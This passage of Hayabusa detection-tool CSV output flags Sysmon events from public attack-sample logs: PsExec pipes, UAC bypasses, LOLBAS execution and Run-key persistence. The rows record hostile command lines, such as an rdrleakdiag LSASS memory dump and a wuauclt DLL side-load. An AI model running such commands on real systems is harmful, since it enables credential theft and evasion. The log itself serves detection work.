747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:20:11.245 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:20:11.247 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:42:00.726 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:00.969 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:01.092 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:01.093 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdout | Process: 
C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:01.093 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:15.033 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: C:\Windows\system32\svchost.exe | PID: 1000 | PGUID: 747F3D96-96B6-5F70-0000-0010E5382E00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:15.525 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:15.530 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,info,,Process Created,"Cmd: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap | Process: C:\Windows\System32\rdrleakdiag.exe | User: DESKTOP-PIU87N6\wanwan | Parent Cmd: ""C:\WINDOWS\system32\cmd.exe"" | LID: 0x30b90 | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,high,Evas,RdrLeakDiag Process Dump,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,high,CredAccess,Process Dump via RdrLeakDiag.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.206 +09:00,DESKTOP-PIU87N6,8,medium,,Process Injection,Src Process: C:\Windows\System32\rdrleakdiag.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 3352 | Src PGUID: 
BC47D85C-DB68-5F71-0000-0010B237AB01 | Tgt PID: 668 | Tgt PGUID: BC47D85C-FAA9-5F68-0000-0010D9590000,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,info,,Process Created,Cmd: C:\WINDOWS\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\lsass.exe | LID: 0x3e7 | PID: 7468 | PGUID: BC47D85C-DB68-5F71-0000-00109138AB01,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,CredAccess,Suspicious LSASS Process Clone,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.630 +09:00,DESKTOP-PIU87N6,11,info,,File Created,Path: C:\Users\wanwan\Desktop\minidump_668.dmp | Process: C:\WINDOWS\system32\rdrleakdiag.exe | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: POC.exe | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x5a873 | PID: 4696 | PGUID: 747F3D96-2156-5F76-0000-0010DBE82500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,,Suspicious Program 
Names,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: Program | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: POC.exe | LID: 0x5a873 | PID: 5448 | PGUID: 747F3D96-2156-5F76-0000-00100EEC2500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.775 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\abc.txt | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 6932 | PGUID: 747F3D96-1903-5F76-0000-0010B85E0900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-06 05:43:58.351 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt 
Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.351 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.390 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.390 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.394 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: 
C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.394 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 
0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 
6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\mmc.exe"" WF.msc | LID: 0x391e334 | PID: 12876 | PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Windows\System32\mmc.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | 
Access: 0x1fffff | Src PID: 20228 | Src PGUID: 00247C92-9E03-5F7B-0000-0010A645272C | Tgt PID: 12876 | Tgt PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,../hayabusa-rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,../hayabusa-rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-07 07:11:17.572 +09:00,02694w-win10.threebeesco.com,18,info,,Pipe Connected,\winreg | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,Exec | Persis,DLL Load via LSASS,,../hayabusa-rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,Exec | Persis,DLL Load via 
LSASS,,../hayabusa-rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-07 07:11:18.680 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64037 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-07 07:11:18.680 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.143:49920 (02694w-win10.threebeesco.com) | Dst: 172.16.66.36:49670 (01566S-WIN16-IR) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\lsass.exe | PID: 632 | PGUID: 6A3C3EF2-E698-5F7C-0000-00103C790000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-07 07:11:18.930 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64038 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 6372 | PGUID: 
00247C92-09FE-5F86-0000-0010AC861401,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 7648 | PGUID: 00247C92-09FE-5F86-0000-0010AD861401,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\smartscreen.exe -Embedding | Process: C:\Windows\System32\smartscreen.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8d824 | PID: 2656 | PGUID: 747F3D96-4BCE-5F88-0000-00103F464D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,Persis,New RUN Key Pointing to Suspicious Folder,,../hayabusa-rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\tendyron.exe"" | LID: 0x8d824 | PID: 6392 | PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.738 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 